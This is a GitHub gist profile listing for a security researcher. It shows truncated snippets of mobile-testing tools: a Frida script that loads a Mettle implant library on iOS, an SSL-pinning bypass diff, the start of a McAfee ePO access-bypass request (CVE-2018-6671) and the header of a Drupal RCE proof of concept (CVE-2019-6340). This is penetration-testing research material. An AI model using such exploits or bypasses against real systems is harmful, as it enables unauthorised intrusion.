Skip to content

Instantly share code, notes, and snippets.

View leonjza's full-sized avatar
[hip, hip]

Leon Jacobs leonjza

[hip, hip]
676 followers · 0 following
View GitHub Profile
@leonjza
leonjza / forward.sh
Created October 1, 2019 10:06
Forward a new host port to a running docker container.
#!/bin/bash
# Add a firewall NAT rule to expose a port open in a docker container, on a host.
#
# This is only really useful if the container is already running, and you don't
# want to/can't shut it down, but need a new incoming port open.
#
# Requires `jq` for parsing docker container information.
#
# 2019 @leonjza
@leonjza
leonjza / mettle.js
Created October 1, 2019 08:20
Mettle Frida Module Load Error
const dlib = 'mettle.dylib';
const NSDocumentDirectory = 9;
const NSUserDomainMask = 1
const p = ObjC.classes.NSFileManager.defaultManager()
.URLsForDirectory_inDomains_(NSDocumentDirectory, NSUserDomainMask).lastObject().path();
const dylibPath = p + '/' + dlib;
const cm = new CModule(""+
"#include <glib.h>" +
"" +
@leonjza
leonjza / build-steps.sh
Created August 14, 2019 08:44
objection Jenkins pipeline steps
# Build the target application (PewPew is the name for my app)
xcodebuild build build -workspace PewPew.xcworkspace -scheme PewPew -sdk iphonesimulator12.2
#
# iOS Simulator setup
#
echo "Simulator Setup"
echo "==============="
@leonjza
leonjza / README.md
Last active August 14, 2019 08:38
objection Flex plugin

objection Flex plugin

This plugin should sideload Flex[1], loaded as a plugin in objection[2]. Flex itself should be a shared library (with your target's architecture as either a thin/fat Mach-o).

The source code for a shared library called libFlex is included in this gist as .h and .m files. You need to copy the Classes/ directory from the official Flex project[1] into your project.

[1] https://github.com/Flipboard/FLEX
[2] https://github.com/sensepost/objection

@leonjza
leonjza / pinning.ts.diff
Created May 16, 2019 22:16
SSLCertificateChecker-PhoneGap-Plugin Pinning Disable
diff --git a/agent/src/ios/pinning.ts b/agent/src/ios/pinning.ts
index 1f9407a..aa2152a 100644
--- a/agent/src/ios/pinning.ts
+++ b/agent/src/ios/pinning.ts
@@ -283,6 +283,38 @@ export namespace sslpinning {
});
};
+ const cordovaCustomURLConnectionDelegate = (ident: string): InvocationListener => {
+ // https://github.com/EddyVerbruggen/SSLCertificateChecker-PhoneGap-Plugin/blob/
@leonjza
leonjza / README.md
Last active March 2, 2020 07:58
objection Stetho sideload plugin
@leonjza
leonjza / cve-2018-6671.txt
Last active September 26, 2019 07:47
cve-2018-6671 McAfee ePO 5.9.1 Registered Executable Local Access Bypass
# CVE-2018-6671 McAfee ePO 5.9.1 Registered Executable Local Access Bypass
# Specifying an X-Forwarded-For header bypasses the local only check
# https://kc.mcafee.com/corporate/index?page=content&id=SB10240
# https://nvd.nist.gov/vuln/detail/CVE-2018-6671
#
# 2019 @leonjza
#
# Tested on ePO v5.9.1, missing hotfix EPO5xHF1229850
POST /Notifications/testRegExe.do HTTP/1.1
@leonjza
leonjza / cve-2019-6340.py
Last active February 27, 2020 18:39
CVE-2019-6340
#!/usr/bin/env python3
# CVE-2019-6340 Drupal <= 8.6.9 REST services RCE PoC
# 2019 @leonjza
# Technical details for this exploit is available at:
# https://www.drupal.org/sa-core-2019-003
# https://www.ambionics.io/blog/drupal8-rce
# https://twitter.com/jcran/status/1099206271901798400
@leonjza
leonjza / index.html
Created July 23, 2018 21:12
HTML5 Drag 'n drop API test
<html>
<head></head>
<body id="drop_zone" ondragenter="dragEnterHandler(event);">
<div>
<p>Drag one or more files to this Drop Zone ...</p>
</div>
</body>
@leonjza
leonjza / mq_clients.go
Last active June 11, 2018 07:26
IBM MQ "mq_clients" osquery Custom Table
package main
import (
"context"
"flag"
"log"
"os"
"os/exec"
"regexp"
"strings"